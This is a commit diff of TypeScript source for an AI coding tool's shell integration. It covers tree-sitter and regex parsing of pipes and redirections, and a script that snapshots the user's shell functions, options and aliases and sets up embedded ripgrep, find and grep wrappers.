init claude-code
This commit is contained in:
@@ -0,0 +1,318 @@
|
||||
import memoize from 'lodash-es/memoize.js'
|
||||
import {
|
||||
extractOutputRedirections,
|
||||
splitCommandWithOperators,
|
||||
} from './commands.js'
|
||||
import type { Node } from './parser.js'
|
||||
import {
|
||||
analyzeCommand,
|
||||
type TreeSitterAnalysis,
|
||||
} from './treeSitterAnalysis.js'
|
||||
|
||||
/** One output redirection found in a shell command. */
export type OutputRedirection = {
  /** The redirect destination as reported by the parser. */
  target: string
  /** The redirect operator: either `>` or `>>`. */
  operator: '>' | '>>'
}
|
||||
|
||||
/**
 * Contract shared by the parsed-command implementations in this module:
 * the tree-sitter-backed one and the regex fallback.
 */
export interface IParsedCommand {
  /** The command string this instance was built from. */
  readonly originalCommand: string

  toString(): string

  /** The command split into its pipe-separated segments. */
  getPipeSegments(): string[]

  /** The command text with output redirections removed. */
  withoutOutputRedirections(): string

  /** The output redirections found in the command. */
  getOutputRedirections(): OutputRedirection[]

  /**
   * Tree-sitter analysis data, when it exists.
   * The regex fallback implementation returns null.
   */
  getTreeSitterAnalysis(): TreeSitterAnalysis | null
}
|
||||
|
||||
/**
 * @deprecated Legacy regex/shell-quote path, used only when tree-sitter is
 * unavailable. The primary gate is parseForSecurity (ast.ts).
 *
 * Fallback implementation built on the shell-quote based helpers from
 * ./commands.js. Exported for testing purposes.
 */
export class RegexParsedCommand_DEPRECATED implements IParsedCommand {
  constructor(readonly originalCommand: string) {}

  toString(): string {
    return this.originalCommand
  }

  /**
   * Splits the command on `|` tokens. Tokens between two pipes are re-joined
   * with single spaces. If splitting throws, or yields nothing, the whole
   * original command is returned as the only segment.
   */
  getPipeSegments(): string[] {
    const wholeCommand = [this.originalCommand]
    try {
      const segments: string[] = []
      let pending: string[] = []
      // Emit the tokens collected so far as one segment (no-op when empty).
      const flush = (): void => {
        if (pending.length === 0) return
        segments.push(pending.join(' '))
        pending = []
      }

      for (const token of splitCommandWithOperators(this.originalCommand)) {
        if (token === '|') {
          flush()
        } else {
          pending.push(token)
        }
      }
      flush()

      return segments.length === 0 ? wholeCommand : segments
    } catch {
      return wholeCommand
    }
  }

  /**
   * Returns the command with output redirections stripped, or the original
   * command untouched when it has none.
   */
  withoutOutputRedirections(): string {
    const original = this.originalCommand
    // Cheap pre-check: without a '>' there is nothing to extract.
    if (original.includes('>')) {
      const extracted = extractOutputRedirections(original)
      if (extracted.redirections.length > 0) {
        return extracted.commandWithoutRedirections
      }
    }
    return original
  }

  getOutputRedirections(): OutputRedirection[] {
    return extractOutputRedirections(this.originalCommand).redirections
  }

  /** The regex path has no tree-sitter data; always null. */
  getTreeSitterAnalysis(): TreeSitterAnalysis | null {
    return null
  }
}
|
||||
|
||||
/**
 * An output redirection together with the start/end offsets of the syntax
 * node it was read from.
 */
interface RedirectionNode extends OutputRedirection {
  startIndex: number
  endIndex: number
}
|
||||
|
||||
/**
 * Depth-first walk: calls `visitor` on `node` first, then recurses into each
 * child in order.
 */
function visitNodes(node: Node, visitor: (node: Node) => void): void {
  visitor(node)
  node.children.forEach(child => visitNodes(child, visitor))
}
|
||||
|
||||
/**
 * Collects the start offset of every `|` child of every `pipeline` node under
 * `rootNode`, in ascending order.
 */
function extractPipePositions(rootNode: Node): number[] {
  const offsets: number[] = []

  visitNodes(rootNode, current => {
    if (current.type !== 'pipeline') return
    current.children
      .filter(child => child.type === '|')
      .forEach(pipe => offsets.push(pipe.startIndex))
  })

  // The walk is depth-first. For `a | b && c | d`, the outer `list` nests the
  // second pipeline as a sibling of the first, so the outer `|` is reached
  // before the inner one and offsets arrive out of order. getPipeSegments
  // slices left-to-right, so hand it a sorted list.
  offsets.sort((left, right) => left - right)
  return offsets
}
|
||||
|
||||
/**
 * Collects every `file_redirect` node under `rootNode` that has both a
 * `>`/`>>` operator child and a `word` child (used as the target).
 * Redirect nodes missing either child are ignored.
 */
function extractRedirectionNodes(rootNode: Node): RedirectionNode[] {
  const found: RedirectionNode[] = []

  visitNodes(rootNode, current => {
    if (current.type !== 'file_redirect') return

    const operatorNode = current.children.find(
      c => c.type === '>' || c.type === '>>',
    )
    const targetNode = current.children.find(c => c.type === 'word')
    if (!operatorNode || !targetNode) return

    found.push({
      startIndex: current.startIndex,
      endIndex: current.endIndex,
      target: targetNode.text,
      operator: operatorNode.type as '>' | '>>',
    })
  })

  return found
}
|
||||
|
||||
/**
 * Parsed command backed by data extracted from a tree-sitter syntax tree:
 * pipe offsets, redirection nodes, and the tree-sitter analysis object.
 */
class TreeSitterParsedCommand implements IParsedCommand {
  readonly originalCommand: string
  // Tree-sitter's startIndex/endIndex are UTF-8 byte offsets, but JS
  // String.slice() uses UTF-16 code-unit indices. For ASCII they coincide;
  // for multi-byte code points (e.g. `—` U+2014: 3 UTF-8 bytes, 1 code unit)
  // they diverge and slicing the string directly lands mid-token. Slicing
  // the UTF-8 Buffer with tree-sitter's byte offsets and decoding back to
  // string is correct regardless of code-point width.
  private readonly commandBytes: Buffer
  private readonly pipePositions: number[]
  private readonly redirectionNodes: RedirectionNode[]
  private readonly treeSitterAnalysis: TreeSitterAnalysis

  /**
   * @param command - The original command text.
   * @param pipePositions - Byte offsets of each `|`, in ascending order.
   * @param redirectionNodes - Redirections with their byte ranges.
   * @param treeSitterAnalysis - Analysis object returned as-is by
   *   getTreeSitterAnalysis().
   */
  constructor(
    command: string,
    pipePositions: number[],
    redirectionNodes: RedirectionNode[],
    treeSitterAnalysis: TreeSitterAnalysis,
  ) {
    this.originalCommand = command
    this.commandBytes = Buffer.from(command, 'utf8')
    this.pipePositions = pipePositions
    this.redirectionNodes = redirectionNodes
    this.treeSitterAnalysis = treeSitterAnalysis
  }

  toString(): string {
    return this.originalCommand
  }

  /**
   * Slices the command at each pipe offset and returns the trimmed, non-empty
   * pieces. With no pipes, or when every piece is blank, the whole original
   * command is returned as the single segment. The blank case matches the
   * regex fallback, so callers never receive an empty list.
   */
  getPipeSegments(): string[] {
    if (this.pipePositions.length === 0) {
      return [this.originalCommand]
    }

    const segments: string[] = []
    let currentStart = 0

    for (const pipePos of this.pipePositions) {
      const segment = this.commandBytes
        .subarray(currentStart, pipePos)
        .toString('utf8')
        .trim()
      if (segment) {
        segments.push(segment)
      }
      // Skip over the one-byte `|` itself.
      currentStart = pipePos + 1
    }

    const lastSegment = this.commandBytes
      .subarray(currentStart)
      .toString('utf8')
      .trim()
    if (lastSegment) {
      segments.push(lastSegment)
    }

    return segments.length > 0 ? segments : [this.originalCommand]
  }

  /**
   * Returns the command with every recorded redirection byte range cut out,
   * then trimmed and with whitespace runs collapsed to single spaces.
   */
  withoutOutputRedirections(): string {
    if (this.redirectionNodes.length === 0) return this.originalCommand

    // Cut from the end backwards so earlier offsets stay valid.
    const sorted = [...this.redirectionNodes].sort(
      (a, b) => b.startIndex - a.startIndex,
    )

    let result = this.commandBytes
    for (const redir of sorted) {
      result = Buffer.concat([
        result.subarray(0, redir.startIndex),
        result.subarray(redir.endIndex),
      ])
    }
    return result.toString('utf8').trim().replace(/\s+/g, ' ')
  }

  /** The redirections without their byte offsets. */
  getOutputRedirections(): OutputRedirection[] {
    return this.redirectionNodes.map(({ target, operator }) => ({
      target,
      operator,
    }))
  }

  getTreeSitterAnalysis(): TreeSitterAnalysis {
    return this.treeSitterAnalysis
  }
}
|
||||
|
||||
/**
 * Memoized probe: resolves to true when ./parser.js can be imported and
 * parses a trivial command to a non-null result, false on any failure.
 */
const getTreeSitterAvailable = memoize(async (): Promise<boolean> => {
  try {
    const parser = await import('./parser.js')
    const probe = await parser.parseCommand('echo test')
    return probe !== null
  } catch {
    return false
  }
})
|
||||
|
||||
/**
 * Creates a TreeSitterParsedCommand from an AST root the caller already has,
 * so the redundant native.parse that ParsedCommand.parse would perform is
 * skipped.
 */
export function buildParsedCommandFromRoot(
  command: string,
  root: Node,
): IParsedCommand {
  return new TreeSitterParsedCommand(
    command,
    extractPipePositions(root),
    extractRedirectionNodes(root),
    analyzeCommand(root, command),
  )
}
|
||||
|
||||
/**
 * Parses `command`, preferring tree-sitter and falling back to the regex
 * implementation. An empty command yields null.
 */
async function doParse(command: string): Promise<IParsedCommand | null> {
  if (!command) return null

  if (await getTreeSitterAvailable()) {
    try {
      const parser = await import('./parser.js')
      const parsed = await parser.parseCommand(command)
      if (parsed) {
        // Native NAPI parser returns plain JS objects (no WASM handles);
        // nothing to free — extract directly.
        return buildParsedCommandFromRoot(command, parsed.rootNode)
      }
    } catch {
      // Tree-sitter failed for this command; use the regex path below.
    }
  }

  // Regex fallback: tree-sitter unavailable, returned nothing, or threw.
  return new RegexParsedCommand_DEPRECATED(command)
}
|
||||
|
||||
// One-slot cache. Legacy callers (bashCommandIsSafeAsync,
// buildSegmentWithoutRedirections) may call ParsedCommand.parse several times
// in a row with the same command string. Each parse() costs ~1 native.parse
// plus ~6 tree walks, so remembering the most recent command avoids the
// repeated work. Keeping only one entry avoids leaking
// TreeSitterParsedCommand instances.
let lastCmd: string | undefined
let lastResult: Promise<IParsedCommand | null> | undefined

/**
 * Entry point for working with shell commands. Parsing is quote-aware via
 * tree-sitter when that is available and regex-based otherwise.
 */
export const ParsedCommand = {
  /**
   * Parses a command string into an IParsedCommand.
   * Resolves to null if parsing fails completely.
   */
  parse(command: string): Promise<IParsedCommand | null> {
    // Re-parse unless the previous call was for this exact string.
    if (lastResult === undefined || lastCmd !== command) {
      lastCmd = command
      lastResult = doParse(command)
    }
    return lastResult
  },
}
|
||||
@@ -0,0 +1,582 @@
|
||||
import { execFile } from 'child_process'
|
||||
import { execa } from 'execa'
|
||||
import { mkdir, stat } from 'fs/promises'
|
||||
import * as os from 'os'
|
||||
import { join } from 'path'
|
||||
import { logEvent } from 'src/services/analytics/index.js'
|
||||
import { registerCleanup } from '../cleanupRegistry.js'
|
||||
import { getCwd } from '../cwd.js'
|
||||
import { logForDebugging } from '../debug.js'
|
||||
import {
|
||||
embeddedSearchToolsBinaryPath,
|
||||
hasEmbeddedSearchTools,
|
||||
} from '../embeddedTools.js'
|
||||
import { getClaudeConfigHomeDir } from '../envUtils.js'
|
||||
import { pathExists } from '../file.js'
|
||||
import { getFsImplementation } from '../fsOperations.js'
|
||||
import { logError } from '../log.js'
|
||||
import { getPlatform } from '../platform.js'
|
||||
import { ripgrepCommand } from '../ripgrep.js'
|
||||
import { subprocessEnv } from '../subprocessEnv.js'
|
||||
import { quote } from './shellQuote.js'
|
||||
|
||||
// A single backslash, spliced into generated shell text.
const LITERAL_BACKSLASH = '\\'
// Timeout for the snapshot shell process, in milliseconds (10 seconds).
const SNAPSHOT_CREATION_TIMEOUT = 10 * 1000
|
||||
|
||||
/**
 * Builds the text of a shell function named `funcName` that runs
 * `binaryPath` with argv[0] set to `argv0`. This relies on the bun-internal
 * ARGV0 dispatch trick: the bun binary inspects its argv[0] and runs the
 * matching embedded tool (rg, bfs, ugrep).
 *
 * @param prependArgs - Arguments placed before the user's own args (e.g.
 *   default flags). They are inserted literally, so each element must be a
 *   valid shell word (no spaces/special chars).
 */
function createArgv0ShellFunction(
  funcName: string,
  argv0: string,
  binaryPath: string,
  prependArgs: string[] = [],
): string {
  const quotedPath = quote([binaryPath])
  const argSuffix = [...prependArgs, '"$@"'].join(' ')
  const invocation = `${quotedPath} ${argSuffix}`
  // On zsh and on Windows the ARGV0 environment variable carries the name.
  const viaEnvVar = ` ARGV0=${argv0} ${invocation}`

  const lines: string[] = []
  lines.push(`function ${funcName} {`)
  lines.push(' if [[ -n $ZSH_VERSION ]]; then')
  lines.push(viaEnvVar)
  lines.push(
    ' elif [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]] || [[ "$OSTYPE" == "win32" ]]; then',
  )
  // On Windows (git bash), exec -a does not work, so the ARGV0 env var is used
  // instead; the bun binary reads ARGV0 natively to set argv[0].
  lines.push(viaEnvVar)
  lines.push(' elif [[ $BASHPID != $$ ]]; then')
  lines.push(` exec -a ${argv0} ${invocation}`)
  lines.push(' else')
  lines.push(` (exec -a ${argv0} ${invocation})`)
  lines.push(' fi')
  lines.push('}')
  return lines.join('\n')
}
|
||||
|
||||
/**
 * Produces the ripgrep shell integration: a shell function when ripgrep is
 * embedded (needs argv0), otherwise the target string for a plain alias.
 * @returns The integration type and the shell snippet to use
 */
export function createRipgrepShellIntegration(): {
  type: 'alias' | 'function'
  snippet: string
} {
  const { argv0, rgPath, rgArgs } = ripgrepCommand()

  // Embedded ripgrep (bun-internal) needs a shell function that sets argv0.
  if (argv0) {
    return {
      type: 'function',
      snippet: createArgv0ShellFunction('rg', argv0, rgPath),
    }
  }

  // Regular ripgrep: quoted path followed by any quoted default args.
  const quotedPath = quote([rgPath])
  const quotedArgs = rgArgs.map(arg => quote([arg]))
  return { type: 'alias', snippet: [quotedPath, ...quotedArgs].join(' ') }
}
|
||||
|
||||
/**
 * Version-control directories left out of grep searches. Kept in step with
 * the list in GrepTool (see GrepTool.ts: VCS_DIRECTORIES_TO_EXCLUDE).
 */
const VCS_DIRECTORIES_TO_EXCLUDE = ['.git', '.svn', '.hg', '.bzr', '.jj', '.sl'] as const
|
||||
|
||||
/**
 * Builds the shell snippet that makes `find` and `grep` run the bfs and ugrep
 * builds embedded in the bun binary (ant-native only). The rg integration
 * only activates when no system rg exists; this one always shadows the
 * system find/grep, because bfs/ugrep are drop-in replacements and we want
 * consistent fast behavior.
 *
 * When embedded search tools are available, the dedicated GlobTool/GrepTool
 * are removed from the tool registry and these wrappers stand in for them.
 * The injected flags therefore mirror those tools' semantics, not GNU
 * find/grep.
 *
 * `find` ↔ GlobTool:
 *   - `-regextype findutils-default` is injected. bfs defaults to POSIX BRE
 *     for -regex, while GNU find defaults to emacs-flavor (which supports
 *     `\|` alternation). Without the flag,
 *     `find . -regex '.*\.\(js\|ts\)'` silently returns zero results. A
 *     -regextype given later by the user still overrides it.
 *   - No gitignore filtering: GlobTool passes `--no-ignore` to rg, and bfs
 *     has no gitignore support anyway, so the default already matches.
 *   - Hidden files are included: GlobTool uses `--hidden`, and it is bfs's
 *     default.
 *
 * Caveat: even with findutils-default, Oniguruma (bfs's regex engine) uses
 * leftmost-first alternation rather than POSIX leftmost-longest. A pattern
 * where one alternative is a prefix of another (e.g., `\(ts\|tsx\)`) may
 * miss matches GNU find would catch. Workaround: list the longer
 * alternative first.
 *
 * `grep` ↔ GrepTool (file filtering) + GNU grep (regex syntax):
 *   - `-G` (basic regex / BRE): GNU grep defaults to BRE, where `\|` is
 *     alternation. ugrep defaults to ERE, where `|` is alternation and `\|`
 *     is a literal pipe. Without -G, `grep "foo\|bar"` silently returns zero
 *     results. A user-supplied `-E`, `-F`, or `-P` later in argv overrides
 *     it.
 *   - `--ignore-files`: respect .gitignore (GrepTool relies on rg's default,
 *     which respects gitignore). Override with `grep --no-ignore-files`.
 *   - `--hidden`: include hidden files (GrepTool passes `--hidden` to rg).
 *     Override with `grep --no-hidden`.
 *   - `--exclude-dir` for VCS dirs: GrepTool passes `--glob '!.git'` etc. to
 *     rg.
 *   - `-I`: skip binary files. rg's recursion silently skips binary matches
 *     by default (unlike its direct-file-arg behavior); ugrep does not, so
 *     -I is injected to match. Override with `grep -a`.
 *
 * Deliberately not carried over from GrepTool:
 *   - `--max-columns 500`: ugrep's `--width` hard-truncates output, which
 *     could break pipelines; rg's version swaps the line for a placeholder.
 *   - Read deny rules / plugin cache exclusions: these need
 *     toolPermissionContext, which is not available when the shell snapshot
 *     is created.
 *
 * @returns The snippet, or null if this build has no embedded search tools.
 */
export function createFindGrepShellIntegration(): string | null {
  if (!hasEmbeddedSearchTools()) return null

  const binaryPath = embeddedSearchToolsBinaryPath()
  const findDefaults = ['-regextype', 'findutils-default']
  const grepDefaults = [
    '-G',
    '--ignore-files',
    '--hidden',
    '-I',
    ...VCS_DIRECTORIES_TO_EXCLUDE.map(d => `--exclude-dir=${d}`),
  ]

  // User shell configs may define aliases such as `alias find=gfind` or
  // `alias grep=ggrep` (common on macOS with Homebrew GNU tools). The snapshot
  // sources user aliases before these function definitions, and bash expands
  // aliases before function lookup, so a renaming alias would silently bypass
  // the embedded bfs/ugrep dispatch. The two `unalias` lines clear them first
  // (same fix the rg integration uses).
  const snippetLines = [
    'unalias find 2>/dev/null || true',
    'unalias grep 2>/dev/null || true',
    createArgv0ShellFunction('find', 'bfs', binaryPath, findDefaults),
    createArgv0ShellFunction('grep', 'ugrep', binaryPath, grepDefaults),
  ]
  return snippetLines.join('\n')
}
|
||||
|
||||
/**
 * Picks the rc file in the user's home directory for a shell path:
 * `.zshrc` if the path contains "zsh", `.bashrc` if it contains "bash",
 * otherwise `.profile`.
 */
function getConfigFile(shellPath: string): string {
  let fileName = '.profile'
  if (shellPath.includes('zsh')) {
    fileName = '.zshrc'
  } else if (shellPath.includes('bash')) {
    fileName = '.bashrc'
  }
  return join(os.homedir(), fileName)
}
|
||||
|
||||
/**
 * Generates the user-specific part of the snapshot script: shell code that
 * appends the user's functions, shell options and aliases to
 * "$SNAPSHOT_FILE". The zsh variant is chosen when `configFile` ends with
 * `.zshrc`; every other config file gets the bash variant.
 *
 * @param configFile - Path of the user's shell configuration file.
 * @returns Shell script text (functions, then options, then aliases).
 */
function getUserSnapshotContent(configFile: string): string {
  const isZsh = configFile.endsWith('.zshrc')

  // User functions
  const functionsSection = isZsh
    ? `
echo "# Functions" >> "$SNAPSHOT_FILE"

# Force autoload all functions first
typeset -f > /dev/null 2>&1

# Now get user function names - filter completion functions (single underscore prefix)
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
typeset +f | grep -vE '^_[^_]' | while read func; do
typeset -f "$func" >> "$SNAPSHOT_FILE"
done
`
    : `
echo "# Functions" >> "$SNAPSHOT_FILE"

# Force autoload all functions first
declare -f > /dev/null 2>&1

# Now get user function names - filter completion functions (single underscore prefix)
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
declare -F | cut -d' ' -f3 | grep -vE '^_[^_]' | while read func; do
# Encode the function to base64, preserving all special characters
encoded_func=$(declare -f "$func" | base64 )
# Write the function definition to the snapshot
echo "eval ${LITERAL_BACKSLASH}"${LITERAL_BACKSLASH}$(echo '$encoded_func' | base64 -d)${LITERAL_BACKSLASH}" > /dev/null 2>&1" >> "$SNAPSHOT_FILE"
done
`

  // Shell options.
  // In the bash variant, `set -o` prints "<name> <on|off>" per option. The
  // status column is matched exactly, because a substring match on "on" also
  // hits options that are off but whose name contains "on" (e.g. `monitor`,
  // `onecmd`) and would turn them on in the snapshot.
  const optionsSection = isZsh
    ? `
echo "# Shell Options" >> "$SNAPSHOT_FILE"
setopt | sed 's/^/setopt /' | head -n 1000 >> "$SNAPSHOT_FILE"
`
    : `
echo "# Shell Options" >> "$SNAPSHOT_FILE"
shopt -p | head -n 1000 >> "$SNAPSHOT_FILE"
set -o | awk '$2 == "on" {print "set -o " $1}' | head -n 1000 >> "$SNAPSHOT_FILE"
echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"
`

  // User aliases
  const aliasesSection = `
echo "# Aliases" >> "$SNAPSHOT_FILE"
# Filter out winpty aliases on Windows to avoid "stdin is not a tty" errors
# Git Bash automatically creates aliases like "alias node='winpty node.exe'" for
# programs that need Win32 Console in mintty, but winpty fails when there's no TTY
if [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]]; then
alias | grep -v "='winpty " | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
else
alias | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
fi
`

  return functionsSection + optionsSection + aliasesSection
}
|
||||
|
||||
/**
 * Generates the Claude Code specific part of the snapshot script. It is
 * included regardless of the user's configuration and appends, in order: the
 * rg fallback (alias or function), the find/grep shadowing functions when
 * embedded search tools exist, and the PATH export.
 */
async function getClaudeCodeSnapshotContent(): Promise<string> {
  // Pick the PATH to export. Default: this process's PATH.
  let pathValue = process.env.PATH
  if (getPlatform() === 'windows') {
    // On Windows with git-bash, read the Cygwin PATH through a shell.
    const { exitCode, stdout } = await execa('echo $PATH', {
      shell: true,
      reject: false,
    })
    if (exitCode === 0 && stdout) {
      pathValue = stdout.trim()
    }
    // Otherwise keep process.env.PATH as the fallback.
  }

  const rgIntegration = createRipgrepShellIntegration()
  const parts: string[] = []

  // If rg is not available, define an alias/function pointing at the bundled
  // ripgrep. The check runs `unalias rg` inside a subshell so that user
  // aliases like `alias rg='rg --smart-case'` don't shadow the real binary
  // check, while the user's aliases in the parent shell stay untouched.
  parts.push(`
# Check for rg availability
echo "# Check for rg availability" >> "$SNAPSHOT_FILE"
echo "if ! (unalias rg 2>/dev/null; command -v rg) >/dev/null 2>&1; then" >> "$SNAPSHOT_FILE"
`)

  if (rgIntegration.type === 'function') {
    // Embedded ripgrep: write the function definition through a heredoc.
    parts.push(`
cat >> "$SNAPSHOT_FILE" << 'RIPGREP_FUNC_END'
${rgIntegration.snippet}
RIPGREP_FUNC_END
`)
  } else {
    // Regular ripgrep: write a simple alias, escaping single quotes.
    const escapedSnippet = rgIntegration.snippet.replace(/'/g, "'\\''")
    parts.push(`
echo ' alias rg='"'${escapedSnippet}'" >> "$SNAPSHOT_FILE"
`)
  }

  parts.push(`
echo "fi" >> "$SNAPSHOT_FILE"
`)

  // For ant-native builds, shadow find/grep with the bfs/ugrep embedded in the
  // bun binary. Unlike rg (used only when system rg is absent), find/grep are
  // always shadowed: bfs/ugrep are drop-in replacements and we want
  // consistent fast behavior in Claude's shell.
  const findGrepIntegration = createFindGrepShellIntegration()
  if (findGrepIntegration !== null) {
    parts.push(`
# Shadow find/grep with embedded bfs/ugrep (ant-native only)
echo "# Shadow find/grep with embedded bfs/ugrep" >> "$SNAPSHOT_FILE"
cat >> "$SNAPSHOT_FILE" << 'FIND_GREP_FUNC_END'
${findGrepIntegration}
FIND_GREP_FUNC_END
`)
  }

  // Finally, export PATH from the snapshot.
  parts.push(`

# Add PATH to the file
echo "export PATH=${quote([pathValue || ''])}" >> "$SNAPSHOT_FILE"
`)

  return parts.join('')
}
|
||||
|
||||
/**
 * Assembles the complete shell script that captures the environment into
 * the snapshot file.
 *
 * @param shellPath - Path of the shell; selects the config file.
 * @param snapshotFilePath - File the script writes the snapshot to.
 * @param configFileExists - Whether the user's config file was found. When
 *   false, it is neither sourced nor inspected.
 */
async function getSnapshotScript(
  shellPath: string,
  snapshotFilePath: string,
  configFileExists: boolean,
): Promise<string> {
  const configFile = getConfigFile(shellPath)
  const isZsh = configFile.endsWith('.zshrc')

  // User-derived content, or the minimal stand-in when there is no config.
  let userContent: string
  if (configFileExists) {
    userContent = getUserSnapshotContent(configFile)
  } else if (!isZsh) {
    // Alias expansion must be forced manually in bash; normally
    // `getUserSnapshotContent` takes care of this.
    userContent = 'echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"'
  } else {
    userContent = ''
  }

  const claudeCodeContent = await getClaudeCodeSnapshotContent()

  const sourceLine = configFileExists
    ? `source "${configFile}" < /dev/null`
    : '# No user config file to source'

  return `SNAPSHOT_FILE=${quote([snapshotFilePath])}
${sourceLine}

# First, create/clear the snapshot file
echo "# Snapshot file" >| "$SNAPSHOT_FILE"

# When this file is sourced, we first unalias to avoid conflicts
# This is necessary because aliases get "frozen" inside function definitions at definition time,
# which can cause unexpected behavior when functions use commands that conflict with aliases
echo "# Unset all aliases to avoid conflicts with functions" >> "$SNAPSHOT_FILE"
echo "unalias -a 2>/dev/null || true" >> "$SNAPSHOT_FILE"

${userContent}

${claudeCodeContent}

# Exit silently on success, only report errors
if [ ! -f "$SNAPSHOT_FILE" ]; then
echo "Error: Snapshot file was not created at $SNAPSHOT_FILE" >&2
exit 1
fi
`
}
|
||||
|
||||
/**
 * Creates and saves the shell environment snapshot by loading the user's
 * shell configuration.
 *
 * This is a central piece of Claude CLI's shell integration. The function:
 *
 * 1. Works out the user's shell config file (.zshrc, .bashrc, etc.)
 * 2. Generates a script that sources that file
 * 3. Runs the script in the user's shell to capture the resulting state:
 *    - functions defined by the user's configuration
 *    - shell options and settings that affect command behavior
 *    - aliases the user has defined
 *
 * The snapshot is written to a file that later shell commands can source, so
 * they run with the user's expected environment, aliases and functions. This
 * lets Claude CLI run commands as if in the user's interactive shell without
 * the cost of starting a new login shell per command. Bash and zsh are both
 * handled, with their differing syntax for functions, options and aliases.
 *
 * If snapshot creation fails (e.g. timeout, permission problems), the CLI
 * keeps working but without the user's custom shell environment, so aliases
 * and functions the user relies on may be missing.
 *
 * @param binShell - Path of the shell binary to run.
 * @returns Promise that resolves to the snapshot file path, or undefined if
 *   creation failed
 */
export const createAndSaveSnapshot = async (
  binShell: string,
): Promise<string | undefined> => {
  let shellType = 'sh'
  if (binShell.includes('zsh')) {
    shellType = 'zsh'
  } else if (binShell.includes('bash')) {
    shellType = 'bash'
  }

  logForDebugging(`Creating shell snapshot for ${shellType} (${binShell})`)

  try {
    const configFile = getConfigFile(binShell)
    logForDebugging(`Looking for shell config file: ${configFile}`)
    const configFileExists = await pathExists(configFile)
    if (!configFileExists) {
      logForDebugging(
        `Shell config file not found: ${configFile}, creating snapshot with Claude Code defaults only`,
      )
    }

    // Unique snapshot path: timestamp plus a short random ID.
    const timestamp = Date.now()
    const randomId = Math.random().toString(36).substring(2, 8)
    const snapshotsDir = join(getClaudeConfigHomeDir(), 'shell-snapshots')
    logForDebugging(`Snapshots directory: ${snapshotsDir}`)
    const shellSnapshotPath = join(
      snapshotsDir,
      `snapshot-${shellType}-${timestamp}-${randomId}.sh`,
    )

    // Make sure the snapshots directory exists.
    await mkdir(snapshotsDir, { recursive: true })

    const snapshotScript = await getSnapshotScript(
      binShell,
      shellSnapshotPath,
      configFileExists,
    )
    logForDebugging(`Creating snapshot at: ${shellSnapshotPath}`)
    logForDebugging(`Execution timeout: ${SNAPSHOT_CREATION_TIMEOUT}ms`)

    // Base environment: empty when CLAUDE_CODE_DONT_INHERIT_ENV is set,
    // otherwise whatever subprocessEnv() provides.
    const inheritedEnv = (
      process.env.CLAUDE_CODE_DONT_INHERIT_ENV ? {} : subprocessEnv()
    ) as typeof process.env

    return await new Promise<string | undefined>(resolve => {
      execFile(
        binShell,
        ['-c', '-l', snapshotScript],
        {
          env: {
            ...inheritedEnv,
            SHELL: binShell,
            GIT_EDITOR: 'true',
            CLAUDECODE: '1',
          },
          timeout: SNAPSHOT_CREATION_TIMEOUT,
          maxBuffer: 1024 * 1024, // 1MB buffer
          encoding: 'utf8',
        },
        async (error, stdout, stderr) => {
          if (error) {
            const execError = error as Error & {
              killed?: boolean
              signal?: string
              code?: number
            }
            logForDebugging(`Shell snapshot creation failed: ${error.message}`)
            logForDebugging(`Error details:`)
            logForDebugging(` - Error code: ${execError?.code}`)
            logForDebugging(` - Error signal: ${execError?.signal}`)
            logForDebugging(` - Error killed: ${execError?.killed}`)
            logForDebugging(` - Shell path: ${binShell}`)
            logForDebugging(` - Config file: ${getConfigFile(binShell)}`)
            logForDebugging(` - Config file exists: ${configFileExists}`)
            logForDebugging(` - Working directory: ${getCwd()}`)
            logForDebugging(` - Claude home: ${getClaudeConfigHomeDir()}`)
            logForDebugging(`Full snapshot script:\n${snapshotScript}`)
            if (stdout) {
              logForDebugging(
                `stdout output (${stdout.length} chars):\n${stdout}`,
              )
            } else {
              logForDebugging(`No stdout output captured`)
            }
            if (stderr) {
              logForDebugging(
                `stderr output (${stderr.length} chars): ${stderr}`,
              )
            } else {
              logForDebugging(`No stderr output captured`)
            }
            logError(
              new Error(`Failed to create shell snapshot: ${error.message}`),
            )
            // Analytics gets the signal as a number, when there is one.
            const signalNumber = execError?.signal
              ? os.constants.signals[
                  execError.signal as keyof typeof os.constants.signals
                ]
              : undefined
            logEvent('tengu_shell_snapshot_failed', {
              stderr_length: stderr?.length || 0,
              has_error_code: !!execError?.code,
              error_signal_number: signalNumber,
              error_killed: execError?.killed,
            })
            resolve(undefined)
            return
          }

          // The shell exited cleanly; confirm the file really exists.
          let snapshotSize: number | undefined
          try {
            snapshotSize = (await stat(shellSnapshotPath)).size
          } catch {
            // Snapshot file not found
          }

          if (snapshotSize === undefined) {
            logForDebugging(
              `Shell snapshot file not found after creation: ${shellSnapshotPath}`,
            )
            logForDebugging(
              `Checking if parent directory still exists: ${snapshotsDir}`,
            )
            try {
              const dirContents =
                await getFsImplementation().readdir(snapshotsDir)
              logForDebugging(
                `Directory contains ${dirContents.length} files`,
              )
            } catch {
              logForDebugging(
                `Parent directory does not exist or is not accessible: ${snapshotsDir}`,
              )
            }
            logEvent('tengu_shell_unknown_error', {})
            resolve(undefined)
            return
          }

          logForDebugging(
            `Shell snapshot created successfully (${snapshotSize} bytes)`,
          )

          // Remove the snapshot on graceful shutdown.
          registerCleanup(async () => {
            try {
              await getFsImplementation().unlink(shellSnapshotPath)
              logForDebugging(
                `Cleaned up session snapshot: ${shellSnapshotPath}`,
              )
            } catch (error) {
              logForDebugging(`Error cleaning up session snapshot: ${error}`)
            }
          })

          resolve(shellSnapshotPath)
        },
      )
    })
  } catch (error) {
    logForDebugging(`Unexpected error during snapshot creation: ${error}`)
    if (error instanceof Error) {
      logForDebugging(`Error stack trace: ${error.stack}`)
    }
    logError(error)
    logEvent('tengu_shell_snapshot_error', {})
    return undefined
  }
}
|
||||
+2679
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,294 @@
|
||||
import {
|
||||
hasMalformedTokens,
|
||||
hasShellQuoteSingleQuoteBug,
|
||||
type ParseEntry,
|
||||
quote,
|
||||
tryParseShellCommand,
|
||||
} from './shellQuote.js'
|
||||
|
||||
/**
 * Rearranges a command with pipes to place stdin redirect after the first command.
